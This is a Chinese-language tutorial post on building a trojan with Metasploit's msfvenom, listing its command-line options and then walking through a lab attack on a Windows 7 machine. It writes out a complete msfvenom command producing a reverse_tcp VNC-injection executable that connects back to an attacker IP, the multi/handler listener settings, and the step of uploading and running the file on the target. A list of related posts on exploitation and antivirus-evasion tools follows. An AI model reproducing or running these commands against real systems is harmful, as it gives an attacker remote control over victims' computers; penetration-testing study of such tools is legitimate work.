Metasploit -- 木马生成原理和方法

简介: Metasploit -- 木马生成原理和方法

一、生成方式:利用msf模块中的msfvenom模块


二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线


三、msfvenom命令行选项如下


-p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定    


-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all    


-n, --nopsled    <length>        为payload预先指定一个NOP滑动长度    


-f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)    


-e, --encoder    [encoder]       指定需要使用的encoder(编码器)    


-a, --arch       <architecture>  指定payload的目标架构        


--platform   <platform>      指定payload的目标平台    


-s, --space      <length>        设定有效攻击荷载的最大长度    


-b, --bad-chars  <list>          设定规避字符集,比如: '\x00\xff'    


-i, --iterations <count>         指定payload的编码次数    


-c, --add-code   <path>          指定一个附加的win32 shellcode文件    


-x, --template   <path>          指定一个自定义的可执行文件作为模板    


-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行        


--payload-options            列举payload的标准选项    


-o, --out   <path>               保存payload    


-v, --var-name <name>            指定一个自定义的变量,以确定输出格式        


--shellest                   最小化生成payload    


-h, --help                       查看帮助选项        


--help-formats               查看msf支持的输出格式列表


四、使用方法


1、msfvenom --list platforms   显示支持的平台


0a2653c851af460fa595bd959398a8f1.png


2、msfvenom --list formats   显示支持的格式


0eacb84100b54626af849e6b562bf92a.png

2d65d23f6d4748949b924e4057485923.png


3、msfvenom --list archs   显示支持的架构


2e9b90b2ca334476abebe75bafe6eeaa.png


4、msfvenom --list encoders   显示支持的编码器


0a2653c851af460fa595bd959398a8f1.png


5、生成木马


目标主机:192.168.1.129(win7 x64)


攻击机:192.168.1.33


攻击端口:12121


生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe


0eacb84100b54626af849e6b562bf92a.png


6、进入监听模块          use exploit/multi/handler


7、设置payload反弹    set payload windows/x64/vncinject/reverse_tcp


2d65d23f6d4748949b924e4057485923.png


8、查看需要设置的参数:show options


2e9b90b2ca334476abebe75bafe6eeaa.png


9、设置攻击机ip:set lhost 192.168.1.133


10、设置攻击端口:set lport 12121


0a2653c851af460fa595bd959398a8f1.png


11、将生成的exe文件上传到目标主机并运行


12、run攻击


0eacb84100b54626af849e6b562bf92a.png


13、攻击机的监控画面


2d65d23f6d4748949b924e4057485923.png


14、目标主机画面


2e9b90b2ca334476abebe75bafe6eeaa.png


禁止非法,后果自负


目录
相关文章
|
6月前
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
67 0
|
开发工具 C语言 数据安全/隐私保护
免杀工具 -- FourEye
免杀工具 -- FourEye
825 0
免杀工具 -- FourEye
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
620 0
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
204 0
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
531 0
Metasploit -- 攻击Metasploitable2靶机
|
安全
BurpSuite靶场系列之OS命令注入
BurpSuite靶场系列之OS命令注入
298 0
BurpSuite靶场系列之OS命令注入
|
安全 关系型数据库 MySQL
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
|
SQL 安全 测试技术
如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞
本文讲的是如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞,今天我将使用打包的套件攻击工具对bwapp应用程序进行模糊测试,手动执行此测试是一个耗时的时间,可能对任何一个渗透性测试的安全人员来说都是无聊的过程。
3632 0
|
SQL 安全 数据可视化
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。
661 0
齐博cms最新SQL注入网站漏洞 可远程执行代码提权